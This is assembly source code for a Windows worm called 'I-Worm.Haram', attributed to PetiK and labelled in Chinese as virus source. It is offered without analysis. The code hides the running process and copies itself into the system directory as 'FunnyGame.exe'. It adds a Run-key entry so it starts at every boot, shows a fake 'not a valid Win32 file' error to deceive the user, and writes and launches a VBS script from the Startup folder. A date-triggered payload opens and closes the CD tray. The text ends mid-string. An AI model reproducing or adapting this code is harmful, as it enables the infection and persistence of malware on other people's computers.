haram.asm

此為病毒源碼

.586p
.model flat
.code

JUMPS

include win32api.inc

LF      equ     10
CR      equ     13
CRLF    equ     <13,10>

@pushsz         macro   msg2psh, empty
                local   next_instr
                ifnb    <empty>
                %out    too much arguments in macro '@pushsz'
                .err
                endif
                call    next_instr
                db      msg2psh,0
    next_instr:
endm

@endsz  	macro
	        local   nxtchr
	nxtchr: lodsb
	        test    al,al
	        jnz     nxtchr
endm

api	macro a
	extrn a:proc
	call a
endm

WIN32_FIND_DATA		struct
dwFileAttributes	dd 0
ftCreationTime		dd ?,?
ftLastAccessTime	dd ?,?
ftLastWriteTime		dd ?,?
nFileSizeHigh		dd 0
nFileSizeLow		dd 0
dwReserved0		dd 0,0
cFileName		db 260 dup(0)
cAlternateFileName	db 14  dup(0)
			db  2  dup (0)
WIN32_FIND_DATA		ends

PROCESSENTRY32 STRUCT
       dwSize              DWORD ?
       cntUsage            DWORD ?
       th32ProcessID       DWORD ?
       th32DefaultHeapID   DWORD ?
       th32ModuleID        DWORD ?
       cntThreads          DWORD ?
       th32ParentProcessID DWORD ?
       pcPriClassBase      DWORD ?
       dwFlags             DWORD ?
       szExeFile           db 260 dup(?)
PROCESSENTRY32 ENDS

start:	pushad
	@SEH_SetupFrame		<jmp end_worm>

hide_the_worm:
	call hide_worm

get_name:
	push	50
	mov	esi,offset orgwrm
	push	esi
	push	0
	api	GetModuleFileNameA

get_copy_name:
	mov	edi,offset cpywrm
	push	edi
	push	50
	push	edi
	api	GetSystemDirectoryA
	add	edi,eax
	mov	eax,'nuF\'
	stosd
	mov	eax,'aGyn'
	stosd
	mov	eax,'e.em'
	stosd
	mov	eax,'ex'
	stosd
	pop	edi

copy_worm:
	push	1
	push	edi
	push	esi
	api	CopyFileA
	test	eax,eax
	je	ok_copy

	push	50
	push	edi
	push	1
	@pushsz "Haram"
	@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
	push	80000002h
	api	SHSetValueA

	push	50
	push	offset msgwrm
	push	esi
	api	GetFileTitleA
	push	10h
	push	offset msgwrm
	@pushsz "ERROR : this file is not a valid Win32 file."
	push	0
	api	MessageBoxA
ok_copy:

call	inf_doc_personal

get_startup_path:
	push	0
	push	7
	push	offset startup
	push	0
	api	SHGetSpecialFolderPathA
	push	offset startup
	api	SetCurrentDirectoryA

call	cr_vbsname

	mov	edi,offset vbsname

	push	0
	push	1
	push	2
	push	0
	push	1
	push	40000000h
	push	edi
	api	CreateFileA
	mov	ebp,eax
	push	0
	push	offset byte_write
	push	e_vbs - s_vbs
	push	offset s_vbs
	push	ebp
	api	WriteFile
	push	ebp
	api	CloseHandle

	push  	1
	push	offset wscript
	api	WinExec

payload:
	mov	eax,offset sysTime
	push	eax
	api	GetSystemTime
	lea	eax,sysTime
	cmp	word ptr [eax+6],10
	jne	end_payload

	xor	eax,eax
	push	eax
	push	eax
	push	eax
	@pushsz "set CDAudio door open"
	api	mciSendStringA

	push	500
	api	Sleep

	xor	eax,eax
	push	eax
	push	eax
	push	eax
	@pushsz "set CDAudio door closed"
	api	mciSendStringA

	push	40h
	@pushsz "I-Worm.Haram"
	@pushsz "Coded by PetiK -